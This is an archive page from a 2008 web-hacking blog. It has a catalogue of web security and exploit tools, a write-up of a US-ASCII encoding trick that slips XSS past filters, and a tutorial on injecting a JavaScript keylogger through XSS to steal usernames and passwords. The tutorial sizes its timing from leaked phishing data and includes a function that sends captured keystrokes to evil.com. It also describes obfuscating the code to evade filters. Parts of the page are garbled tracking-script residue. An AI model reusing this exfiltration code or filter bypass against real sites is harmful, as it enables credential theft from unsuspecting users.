Archive for June, 2008

Web Hacking Web app security tools…

1 Comment

June 29th, 2008 by admin

Introduction

This section is going to be a live article about the current web app security testing tools:

Web scanners:

WebInspect : A Powerful Web Application Scanner SPI Dynamics’ WebInspect application security assessment tool helps identify known and unknown vulnerabilities within the Web application layer. WebInspect can also help check that a Web server is configured properly, and attempts common web attacks such as parameter injection, cross-site scripting, directory traversal, and more.[1]

NTOSpider is the first next-generation web application vulnerability scanner, providing automated vulnerability assessment with unprecedented accuracy and comprehensiveness. Able to quickly scan and analyze large complex web sites/applications, NTOSpider identifies application vulnerabilities as well as site exposure risk, ranks threat priority, produces highly graphical, intuitive HTML reports, and indicates site security posture by vulnerabilities and threat exposure.[24]

Acunetix Web Vulnerability Scanner : Commercial Web Vulnerability Scanner Acunetix WVS automatically checks your web applications for vulnerabilities such as SQL Injection, cross site scripting, and weak password strength on authentication pages. Acunetix WVS boasts a comfortable GUI and an ability to create professional website security audit reports.[1]

Nikto : A more comprehensive web scanner Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected.[1]

Whisker/libwhisker : Rain.Forest.Puppy’s CGI vulnerability scanner and library Libwhisker is a Perl module geared geared towards HTTP testing. It provides functions for testing HTTP servers for many known security holes, particularly the presence of dangerous CGIs. Whisker is a scanner that used libwhisker but is now deprecated in favor of Nikto which also uses libwhisker.[1]

Wikto : Web Server Assessment Tool Wikto is a tool that checks for flaws in webservers. It provides much the same functionality as Nikto but adds various interesting pieces of functionality, such as a Back-End miner and close Google integration. Wikto is written for the MS .NET environment and registration is required to download the binary and/or source code.[1]

N-Stealth : Web server scanner N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as Whisker/libwhisker and Nikto, but do take their web site with a grain of salt. The claims of “30,000 vulnerabilities and exploits” and “Dozens of vulnerability checks are added every day” are highly questionable. Also note that essentially all general VA tools such as Nessus, ISS Internet Scanner, Retina, SAINT, and Sara include web scanning components. They may not all be as up-to-date or flexible though. N-Stealth is Windows only and no source code is provided.[1]

Security/?referer=http://blog.kassaras.com/wp-admin/edit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php/?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');urchinTracker('/outgoing/www.windowsecurity.com/software/Web-Application-Security/?referer=http://blog.kassaras.com/wp-admin/post.php?action=edit&post=38&message=1&_wp_original_http_referer=http%3A%2F%2Fblog.kassaras.com%2Fwp-admin%2Fedit.php');" href="http://www.windowsecurity.com/software/Web-Application-Security/">The ScanDo Web: ScanDo web application scanner allows the enterprise to conduct ongoing risk assessments to identify the vulnerability of Web applications to hostile attack. It identifies security weaknesses in the Web applications environment and helps eliminate them before they are exploited by hackers and thieves. It scans Web application technologies, including Flash, JavaScript, ASP, XML and Web Services. ScanDo offers control of both automated and manual scanning as well as the ability to replay discovered vulnerabilities to conduct in-depth analysis.

It supports a database for all scanning results with Web reporting for centralized management, and it provides privacy through detection of Social Security and credit card numbers. ScanDo offers a three-stage process for application risk assessment. First, it explores the entire Web application environment and registers its structure and contents. Then it mimics actual hacking methods to identify and uncover the details of any point that is susceptible to attack. In the third stage, ScanDo outputs all scan results into reports that show how to eliminate vulnerabilities.[2]

VForce is a web application security scanner, that simulates attacks for the purpose of testing and analysing a web application for security weaknesses. Like other tools it scans for buffer overruns, manipulation of HTTP requests, brute force vulnerabilities, etc.[2]

ratproxy is a semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.[19]

Goolag Scanner is a standalone windows GUI based application.

1. Configuration. gS uses one xml-based configuration file for its
settings (see Settings).

2. Data-House-holding. All dorks coming with the distribution of gS
are kept inside one file, which resides in
{$Goolag Scanner-Installation Directory}/DorkData/gdorks.xml

The name gdorks.xml is predefined from the configuration (see
above).[22]

security testing tool. It has automated testing module for detecting common web application vulnerabilities, and features geared at aiding manual penetration tests. The only system requirement is Java 5; Windows, Linux and Macintosh builds are available. " target="_blank">Grendel-Scan is an open-source web application security testing tool. It has automated testing module for detecting common web application vulnerabilities, and features geared at aiding manual penetration tests. The only system requirement is Java 5; Windows, Linux and Macintosh builds are available.[23]

APACHE_USERS: Apache username enumerator, via /~username requests. This script uses a list of common system names like root, admin etc … You should manually check the issue to establish the http return code, ie: 403 as this is needed for the command line. No native SSL support.[7]

nnikto a console app to perform forced browsing checks against a web server. The application uses a simple algorithm and various techniques to prevent/reduce false positives.[25]

Manual security testing:

Paros proxy : A web application vulnerability assessment proxy A Java based web proxy for assessing web application vulnerability. It supports editing/viewing HTTP/HTTPS messages on-the-fly to change items such as cookies and form fields. It includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting.[1]

WebScarab : A framework for analyzing applications that communicate using the HTTP and HTTPS protocols In its simplest form, WebScarab records the conversations (requests and responses) that it observes, and allows the operator to review them in various ways. WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented.[1]

Burpsuite : An integrated platform for attacking web applications Burp suite allows an attacker to combine manual and automated techniques to enumerate, analyze, attack and exploit web applications. The various burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.[1]

SPIKE Proxy : HTTP Hacking Spike Proxy is an open source HTTP proxy for finding security flaws in web sites. It is part of the Spike Application Testing Suite and supports automated SQL injection detection, web site crawling, login form brute forcing, overflow detection, and directory traversal detection.[1]

CAL9000: CAL9000 brings together a host of web application security testing tools into one convenient package. It is designed to be used in the Firefox browser. CAL9000 functionality may be limited when used with other browsers.[11]

httpedit:httpedit is a ‘low-level’ interface to HTTP. The application allows you to write a raw HTTP request, send it against a web server and review the response, all from within the same app.[11]

Decompilers:

Jad is a Java decompiler, i.e. program that reads one or more Java class files and converts them into Java source files which can be compiled again.[3]

Jad can be used:

  • for recovering lost source codes;
  • for exploring the sources of Java runtime libraries;
  • as a Java disassembler;
  • as a Java source code cleaner and beautifier. just kidding

Web session analyzers:

Stompy is an advanced utility to test the quality of WWW session identifiers and other tokens that are meant to be unpredictable. It is fully automated, employs a remarkably advanced collection of tests, and probably scratches an important pen-testing itch.[4]

Web fuzzers:

PROTOS HTTP-reply – Another fuzzer from the PROTOS dudes for attack HTTP responses, useful for browser vulns.[5]

Screaming Cobra - Name makes the fuzzer sound better than it really is, but is good for finding CGI bugs. Also, its a perl scrpt so easy to modify or extend.[5]

Mangle – A fuzzer for generating odd HTML tags, it will also autolaunch a browser. Mangle found the infamous IFRAME IE bug.[5]

FUZZLED: Fuzzled is a powerful fuzzing framework. Fuzzled includes helper functions, namespaces, factories which allow a wide variety of fuzzing tools to be developed. Fuzzled comes with several example protocols and drivers for them .This most recent release includes : * Support for a raft of additional protocols, including HTTPInject, NNTP, SMTP and IMAP. * New and improved namespaces. * Improvements to the pattern factory. * Documentation on writing a fuzzer in Fuzzled. * Numerous bugfixes and other minor improvements.[7]

RFuzz is a Ruby library to easily test web applications from the outside using a fast HttpClient and wicked evil RandomGenerator allowing the average programmer to use advanced fuzzing techniques for just pennies a day.[16]

PROTOS HTTP-reply – Another fuzzer from the PROTOS dudes for attack HTTP responses, useful for broswer vulns.[15]

Ajax Security:

Spajax is a security .NET ajax scanning tools from OWASP.[6]

XSS exploiting

XSSshell: XSS Tunnel is a proxy which allows you to traffic any HTTP traffic through a Cross-site Scripting (XSS) Channel opened by XSS Shell. This release includes a new version of XSS Shell, XSS Tunnel and source codes. Please refer to the white paper for details.[7]

XSSSHELL: XSS Shell is a powerful XSS backdoor. XSS Shell allows interactively getting control over a Cross-site Scripting (XSS) vulnerability in a web application. Demonstrates the real power and damage of Cross-site Scripting attacks.[7]

SQL injection exploiting

SqlServerDataExtractor Sometimes we need to drop a binary onto a box and extract the data. This application allows you to specify the connection string and SQL statement. Once the SQL statement executed, the data is output to a file in the application directory, which is loaded into a browser control on the second tab. The reason for using HTML to display the data, is that the application should be flexible enough to handle alot of data.[25]

SSL enumeration & exploitation

ManySSL:Primarily a tool for Linux users to enumerate the SSL ciphers in use on any SSL encrypted service, including mail servers that utilise starttls. This tool has an option to identify only the weak ciphers (Ciphers under 128 bit) so administrators can know which ciphers to remove from their service.[7]

SSLDigger v1.02 Released 8/26/2004. Copyright 2004 (c) by Foundstone, Inc.SSLDigger v1.02 is a tool to assess the strength of SSL servers by testing the ciphers supported. Some of these ciphers are known to be insecure.[8]

THCIISSLame version 0.2 IIS 5 SSL remote root exploit. Uses a connect back shell. [13]

THC SSL Check is a small tool that checks the remote SSL stack for supported ciphers and versions. Useful for pentesting for weak SSL configuration discovery.[13]

THCSSLProxy THCSSLProxy is a small command-line SSL proxy for Window that is useful for penetration testing SSL services like HTTPS, SMTPS, LDAPS, POP3S, and more.[13]

sslciphercheck a new console tool to check supported SSL ciphers, it will also retrieve and extract the certificate information including whether Server Gated Cryptography (SGC) is supported The main problem with existing tools e.g. SSLDigger and thcsslcheck is that they either don’t support SSLv2 or they don’t retrieve the certificate information, so you cannot tell if Server Gated Cryptography is supported…sslciphercheck is designed to over come these issues.[25]

Web Service scanner

WSDigger v1.0 Released 7/12/2005. Copyright 2005 (c) by Foundstone, Inc. WSDigger is a free open source tool designed by Foundstone to automate black-box web services security testing (also known as penetration testing). WSDigger is more than a tool, it is a web services testing framework. Version one of this framework contains sample attack plug-ins for SQL injection, cross site scripting and XPATH injection attacks. A web service vulnerable to XPATH injection is provided as an example with the tool. By releasing the framework as an open-source tool, users are encouraged to develop and share their own plug-ins.System requirements Windows: .NET Framework

Http probers

hoppy:Hoppy (*[H]ttp [O]ptions [P]rober In [PY]thon*) is a http server method prober written in python, does exactly what it says on the tin. It tests http methods for configuration issues leaking information or just to see if they are enabled. Latest Version is 1.5.1[7]

httprint:httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may have been obfuscated by changing the server banner strings, or by plug-ins such as mod_security or servermask.

THCSSLProxy: Small commandline SSL proxy for windows useful for pentesting SSL services like HTTPS, SMTPS, LDAPS, POP3S etc.[12]

Web spiders:

SiteDigger v2.0 Released 1/06/2005. Copyright 2005 (c) by Foundstone, Inc. SiteDigger 2.0 searches Google?€™s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on web sites.[10]
What’s New in SiteDigger 2.0

* 10 times more results! Now you can use FSDB / GHDB and generate 10 results per signature.
* Improved user interface, help file, signature update and results page.
* Decreased false positives.
* Latest signatures (open webcams, credit card numbers, etc).
* Ability to raw search.

Aura:A while back Google encouraged developers to make use of their API. Many people built applications around the API, but alas Google has stopped issuing API keys. This means that those applications (like wikto / etc) lost large portions of their functionality. SensePost AURA (Api Usable / Re-usable Again) will help to get those tools working again. Aura is a very simple web app that runs as an executable on your windows machine and listens on 127.0.0.1:80. [11]

HTTrack:HTTrack is a free and easy-to-use offline browser utility. It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer.

Web Brute forcer’s

WWWhack is a brute force utility that will try to crack web sites guarded by an web access password. This utility can use a word file or try all possible combinations, and by trial-and-error, will attempt to find a combination of username/password that is accepted by the web server.[14]

Database enumeration

Sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more.[18]

Frameworks

ProxMon is an extensible Python based framework that reduces testing effort, improves consistency and reduces errors. Its use requires limited additional effort as it processes the proxy logs that you?€™re already generating and reports discovered issues. In addition to penetration testing, ProxMon is useful in QA, developer testing and regression testing scenarios.[20]

Pantera uses an improved version of SpikeProxy to provide a powerful web application analysis engine.[21]

Reference [1]:http://sectools.org/web-scanners.html

Reference [2]:http://www.windowsecurity.com/software/Web-Application-Security/

Reference [3]:http://www.kpdus.com/jad.html#general

Reference [4]:http://lcamtuf.coredump.cx/

Reference [5]:http://www.infosecinstitute.com/blog/2005/12/fuzzers-ultimate-list.html

Reference [6]:http://cvs.drupal.org/viewvc.py/drupal/contributions/modules/spajax/

Reference [7]: http://www.portcullis.co.uk/16.php

Reference [8]:http://www.foundstone.com/us/resources/proddesc/ssldigger.htm

Reference [9]:http://www.foundstone.com/us/resources/proddesc/wsdigger.htm

Reference [10]:http://www.foundstone.com/us/resources/proddesc/sitedigger.htm

Reference [11]:http://www.hacktoolrepository.com/category.pl?cid=8&categoryname=Web%20applications

Reference [12]:http://freeworld.thc.org/root/tools/

Reference [13]:http://packetstormsecurity.org/groups/thc/index5.html

Reference[14]:http://www.darknet.org.uk/2006/12/wwwhack-19-download-wwwhack19zip-web-hacking-tool/

Reference [15]:http://www.infosecinstitute.com/blog/2005/12/fuzzers-ultimate-list.html

Reference [16]:http://rfuzz.rubyforge.org/

Reference [17]:http://www.gnucitizen.org/blog/web-client-fuzzer_py/

Reference [18]:http://sqlmap.sourceforge.net/

Reference [19]:security.html" target="_blank">http://code.google.com/p/ratproxy/

Reference [20]:http://www.isecpartners.com/proxmon.html

Reference [21]:http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project

Reference [22]: http://www.goolag.org/specifications.html

Reference [23]: http://www.grendel-scan.com/

Reference [24]: http://www.ntobjectives.com/products/ntospider.php

Reference [25]: http://www.woany.co.uk

XSS Hacking Bypassing XSS web filters by using US ASCII encoding…

Comments Off

June 29th, 2008 by admin

Introduction

Not a few articles have been written about the subject I am going to write the article about. And what I am going to comment on, as you already guessed is US ASCII encoding used to by pass the web filters. Now when initially I found this vulnerability, actually I did not find it someone else did I just think it is interesting, I thought the this is going to have a mass impact all web sites!! but unfortunately or fortunately it does not. Anyway, the issues is that the character set ASCII encodes every character with 7 bits. Internet connections transmit octets with 8 bits. If the content of such a transmission is encoded in ASCII, the most significant bit must be ignored.

The Security problem

Of the tested browsers Firefox 1.5 and above, Opera 8.5 and above and Internet Explorer 6 and 7, only the Internet Explorer versions does this correctly, the others evaluate the bit and display the characters as if they were from the character set ISO-8859-1. Although the behavior of the Internet Explorer is the correct one, this creates a security risk: the author of a web page can set the bit on arbitrary characters without changing the look of the page. But virus scanners and content filters see completely different characters, so that there programs cannot detect viruses or Spam. [1]

What do we mean by saying US-ASCII

There are several national variants of ASCII. In such variants, some special characters have been replaced by national letters (and other symbols). There is great variation here, and even within one country and for one language there might be different variants. The original ASCII is therefore often referred to as US-ASCII; the formal standard (by ANSI) is ANSI X3.4-1986.[5]

The name ASCII, originally an abbreviation for “American Standard Code for Information Interchange”, denotes an old character repertoire, code, and encoding.

Most character codes currently in use contain ASCII as their subset in some sense. ASCII is the safest character repertoire to be used in data transfer. However, not even all ASCII characters are “safe”!

ASCII has been used and is used so widely that often the word ASCII refers to “text” or “plain text” in general, even if the character code is something else! The words “ASCII file” quite often mean any text file as opposite to a binary file.

The phrase “original ASCII” is perhaps not quite adequate, since the creation of ASCII started in late 1950s, and several additions and modifications were made in the 1960s. The 1963 version had several unassigned code positions. The ANSI standard, where those positions were assigned, mainly to accommodate lower case letters, was approved in 1967/1968, later modified slightly. For the early history, including pre-ASCII character codes, see Steven J. Searle’s A Brief History of Character Codes in North America, Europe, and East Asia and Tom Jennings’ ASCII: American Standard Code for Information Infiltration. See also Jim Price’s ASCII Chart, Mary Brandel’s 1963: ASCII Debuts, and the computer history documents, including the background and creation of ASCII, written by Bob Bemer, “father of ASCII”.[5]

The explanation

Lets say for example that we want to see if a website is encoding or filtering the < character, what someone would do is to inject < and see what the web application would return.

Now if the web app returns something like < or < then the web application is probably not vulnerable to XSS, now if the web app is using the US-ASCII then things change for IE6/7. IE is going to process all US-ASCII encoding with the most significant bit set .To process for example the < character with IE first we have to convert < to hex meaning in 3c and add hex 80, meaning 3c+80 = bc and then we do a url encoding, then the < is equivalent to %bc for IE6/7 this is a valid encoding.

This offers spammers and virus writers the possibility to bypass installed spam and virus filters. We checked several filter products and all of these failed to detect the manipulated web pages. But it should be quite easy to close this hole by clearing the most significant bit on ASCII encoded web pages before analyzing them.

The JavaScript code:

<script>alert(”This is some obfuscated script!”);</script>

Here is some C# code that removes the most significant bit from the javascript:

int char1;
 Char c1;
 FileStream fs = new FileStream([file path], FileMode.Open);
 BinaryReader r = new BinaryReader(fs);

 r.BaseStream.Seek(0, SeekOrigin.Begin);

 while (r.BaseStream.Position < r.BaseStream.Length)
 {
 char1 = r.ReadByte();
 char1 = char1 – 0×80;
 c1 = (Char)char1;
 Console.Write(c1);
 }

Code example 1:Removing most significant bit [2].

NOTE1: there has been significant discussion about this issue, and as of 20060625, it is not clear where the responsibility for this issue lies, although it might be due to vagueness within the associated standards.[3]

NOTE2: this might only be exploitable with certain encodings.[3]

Impact

CVSS Severity (version 2.0 upgrade from v1.0):
CVSS v2 Base score: 2.6 (Low) (AV:N/AC:H/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 4.9 [3]

Access Vector: Network exploitable , Victim must voluntarily interact with attack mechanism
Access Complexity: High
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification [3]

Current situation

I?€™m happy to report that IE8 is delivering additional XSS-Focused Attack Surface Reduction goodness. For Beta 1 you will notice a small but notable step forward ?€“ the US-ASCII XSS attack vector has now been closed.

References to Advisories, Solutions, and Tools [3]

External Source: XF (disclaimer) Name: ie-ascii-encoded-web-filter-bypass(27288)

Hyperlink: http://xforce.iss.net/xforce/xfdb/27288

External Source: BUGTRAQ (disclaimer) Name: 20060623 Re: Bypassing of web filters by using ASCII

Hyperlink: http://www.securityfocus.com/archive/1/archive/1/438163/100/0/threaded

External Source: BUGTRAQ (disclaimer) Name: 20060623 RE: Bypassing of web filters by using ASCII

Hyperlink: http://www.securityfocus.com/archive/1/archive/1/438154/100/0/threaded

External Source: BUGTRAQ (disclaimer) Name: 20060622 Re: Bypassing of web filters by using ASCII

Hyperlink: http://www.securityfocus.com/archive/1/archive/1/438066/100/0/threaded

External Source: BUGTRAQ (disclaimer) Name: 20060621 Re: Bypassing of web filters by using ASCII

Hyperlink: http://www.securityfocus.com/archive/1/archive/1/438049/100/0/threaded

External Source: BUGTRAQ (disclaimer) Name: 20060621 Bypassing of web filters by using ASCII

Hyperlink: http://www.securityfocus.com/archive/1/archive/1/437948/100/0/threaded

External Source: BUGTRAQ (disclaimer) Name: 20060621 Re: Bypassing of web filters by using ASCII

Hyperlink: http://www.securityfocus.com/archive/1/438051/100/0/threaded

External Source: (disclaimer)

Hyperlink: http://ha.ckers.org/blog/20060621/us-ascii-xss-part-2

External Source: BUGTRAQ (disclaimer) Name: 20060626 RE: Bypassing of web filters by using ASCII

Hyperlink: http://www.securityfocus.com/archive/1/archive/1/438359/100/0/threaded

External Source: BUGTRAQ (disclaimer) Name: 20060626 Re: Bypassing of web filters by using ASCII

Hyperlink: http://www.securityfocus.com/archive/1/archive/1/438358/100/0/threaded

External Source: OSVDB (disclaimer) Name: 28376

Hyperlink: http://www.osvdb.org/28376

External Source: (disclaimer)

Hyperlink: http://ha.ckers.org/blog/20060621/malformed-ascii-bypasses-filters/

Vulnerable software and versions

Configuration 1
??’ Microsoft, Internet Explorer, 6.0.2900

Reference[1]:http://www.iku-ag.de/sicherheit/ascii-eng.jsp

Reference[2]:http://blogs.msdn.com/dross/archive/2006/10/01/780339.aspx

Reference[3]:http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-3227

Reference[4]:http://blogs.msdn.com/dross/archive/2008/03/10/xss-focused-attack-surface-reduction.aspx

Reference[5]:http://www.cs.tut.fi/~jkorpela/chars.html#examples

XSS Hacking Smashing the Web for fun & profit using XSS

2 Comments

June 6th, 2008 by admin

Introduction

This article is dedicated to all this people that believe XSS is not a serious Web application vulnerability. Using XSS vulnerabilities someone can actually make lots of money. I don’t have any responsibility how this knowledge is going to be used, this article was created out of love of hacking and not to hack other people sites. Recently I became very interested to XSS and decided to write an article that fully explains how to inject a JavaScript key logger, and by saying fully explain I mean describe in full detail how can someone perform XSS filter invasion and run my JavaScript key logger in order to steal user names, passwords and user credentials. The scary part is that you don’t have to be a JavaScript expert to write effective JavaScript malicious code, you just have to have a good understanding of the Web. In the following article I provide the reader with two flavors of practically the same JavaScript key logger.

In order to understand this article you have to know:

  1. How to write Html web forms (look at [4]).
  2. How to write JavaScript DOM objects (look at [3]).
  3. Basic functionality of Http protocol (look at [1]).
  4. Understand JavaScript what obfuscation is (have a look at [5]).
  5. Understand how to use Burp Suite1.1 (look at [6]).

The functionality of your XSS

Before you exploit an XSS someone has to understand what is the functionality a XSS exploit should have. By saying functionality I mean what is the reason of your XSS, e.g. to deface a website, to cause a redirect or to steal user credentials (something that is the most interesting!!). In our situation we have to think about writing a key logger XSS. So that is why we have to make some thoughts about what is a log-in page form, from the user perspective, for example what is the average user name and password length? And how fast an average user is typing? We are going to use this information to build up two flavors of JavaScript key loggers that run in IE, Firefox, Opera and Netscape. So our program is going to steal the user credential based on time (e.g. auto execute after certain amount of time), password length (e.g. auto execute after the user types 5 characters) or based on both time and password length (e.g. maybe perform some character mapping, like check if Enter or Tab buttons have been pressed).

How fast do you type?

Why should we think about this factor? Because we have to make more effective our key logger.For the purposes of WPM measurement a word is standardized to five characters or keystrokes. In one study of average computer users, the average rate for transcription was 33 words per minute, and only 19 words per minute for composition.[8] In the same study, when the group was dividing into “fast”, “moderate” and “slow” groups, the average speeds were 40 wpm (words per minute), 35 wpm, and 23 wpm respectively. Two-finger typists, sometimes also referred to as “Hunt-and-Peck” typists, can reach speeds of about 37 wpm for memorized text, and 27 wpm when copying text.[9]

An average typist reaches 50 to 70 wpm, while some positions can require 80 to 95 (usually the minimum required for dispatch positions and other typing jobs), and some advanced typists work at speeds above 120.[7]

Using a personalized interface, quadriplegic physicist Stephen Hawking managed to type 15 wpm with a switch and adapted software created by Walt Woltosz. Due to a slowdown of his motor skills, his interface was upgraded with an infrared camera that detects eye blinks. The actual wpm is unknown.[7]

What is you average password and user name length?

That is truly a hard question to answer because data is scarce. But recently, some spoils from a MySpace phishing attack: 34,000 actual user names and passwords revealed some truths.[10]The attack was pretty basic. The attackers created a fake MySpace login page, and collected login information when users thought they were accessing their own account on the site. The data was forwarded to various compromised web servers, where the attackers would harvest it later.[10]

MySpace estimates that more than 100,000 people fell for the attack before it was shut down. The data I have is from two different collection points, and was cleaned of the small percentage of people who realized they were responding to a phishing attack. I analyzed the data, and this is what I learned.[10]

Password Length:

While 65% of passwords contain eight characters or less, 17% are made up of six characters or less. The average password is eight characters long.[10]

Specifically, the length distribution looks like this:

1-4 0.82%
5 1.1%
6 15%
7 23%
8 25%
9 17%
10 13%
11 2.7%
12 0.93%
13-32 0.93%

Character Mix: While 81% of passwords are alphanumeric, 28% are just lowercase letters plus a single final digit — and two-thirds of those have the single digit 1. Only 3.8% of passwords are a single dictionary word, and another 12% are a single dictionary word plus a final digit — once again, two-thirds of the time that digit is 1.

numbers only 1.3%
letters only 9.6%
alphanumeric 81%
non-alphanumeric 8.3%

Make some use of the information we have

We can understand now that it is very probable that the password length 8 characters and if we assume that the user name 7 characters, because an average person types 37 wpm of memorized text and passwords are memorized text that means that:

Username + Password = 15 characters approximately

One word = 5 characters

Which means that Username + Password = Three words so:

37/3 = 1/x => 37x = 1 => x =1/37 Minutes

or x = 1/37 * 60000 Milliseconds = 1621 Milliseconds (I will explain later why you need milliseconds)

Now we know how much time the average user takes to type his user name and password, we also know that he might also press the Tab or Enter key to switch between text fields and sent the form data. So after the user enters the lo-gin page the key logger is going to check time, the Enter key and the length of the password.

Now lets start with our key logger. In our key logger we have to use the DHTML keypress event which we are going to have to inject some how into the form, the setTimeout JavaScript function and the window object and call the window.open method to execute our code (so that the user wont be redirected into another page if we use the document.location DOM object or we can use the document object, steal the password and the perform a phising attack).

The key logger can became more efficient if we know the password security policy of the web site we are trying to exploit, because if for example the password consists of three letters, two special characters and three numerical characters we can design the key logger so it can detect the format of the password and execute itself after it detects what you are typing (by checking out the length or the characters), the same is valid for the user name.

First version of our JavaScript key logger….

The version of the key logger presented below is not the most efficient, we are going to make lots of modification through out this article. So our first key logger is an easy code example to understand the basics, lets not for now worry about how we are going to inject the javascript and just focus on making functional code first. In the code below we set two variables counter and arrayOfChars, the first variable is going to count how many key presses the user had and the second variable is going to hold all are characters untill we sent them. To sent the characters, we recorded we are going to use the object document.location, but that would mean that the user is going to be redirected from the original web page to another web page! and that would be ok for the first version of our key logger and for simplicity reasons!

Code


Code example1: A simple version of the key logger, using as a condition to execute the recording of three letter word.

Second version of our JavaScript key logger….

So our code is going to execute conditionally, but what about also more efficiently? Well if we use the setTimeout javascript object we can have more effective results by making valid assumptions about how long is going to take to type the user name and the password (by using the data previously displayed above!).

So here is how setTimeout works!

setTimeout()

window.setTimeout() allows you to specify that a piece of JavaScript code (called an expression) will be run a specified number of milliseconds from when the setTimeout() method was called. The general syntax of the method is:[11]

setTimeout ( expression, timeout );

where expression is the JavaScript code to run after timeout milliseconds have elapsed.[11]

setTimeout() also returns a numeric timeout ID that can be used to track the timeout. This is most commonly used with the clearTimeout() method (see below).[11]

Here’s a simple example:

<input type="button" name="clickMe" value="Click me and wait!" onclick="setTimeout('alert(\'Surprise!\')', 5000)"/> [11] 
Here is the html form that uses the onkeypress event:

Html form....

Code example2: Html text box

The above code is going to execute our keyLogger function each time a key is pressed. Now our function is using a global variable called counter that stores the values until the user navigates to another web page!

When we are going to inject our code, we have to override the event in the web form (if one exists!). Which means that we have to insert our code before the event and comment out the rest of the code! (I will explain later all about it). The code expression we are going to write is going to be using the JavaScript timeout like that:

function autoTrigger() { setTimeout(’sentData()’,1621 ); }

Code example3: This function is going to replace function sentData in line 28 in code example 1

The html code in code example 2 won’t change at all, we have to change only line 28! and our code is going to auto trigger after 1621 milliseconds and only if the length of the word we insert inside the is longer than 3 characters….

To make are logger more interesting we have to change both the execution conditions and the html form input. We will detect the enter and keywords and assume the length of the user name and password are 15 characters…….

To do that we have to change the only the sentData() function and make it look like that:

function sentData(var _keyNum){
if (arrayOfCharsToSent.length <= 15 && _keyNum == 13) {// 13 is the ascii numerical value of enter….
window.open(’http://www.evil.com/cgi?’+arrayOfCharsToSent.toString(),
‘jav’,
‘menubar=no,toolbar=no,scrollbars=no,width=1,height=1,resizable=yes’);
new_Win.blur()// This code is going to minimize the popup window
}
}

Now our key logger would look like this:

More modifications to the code

Now we have to optimize compress and obfuscate our code in order to invade the web filters, so after some processing the code will look like that:

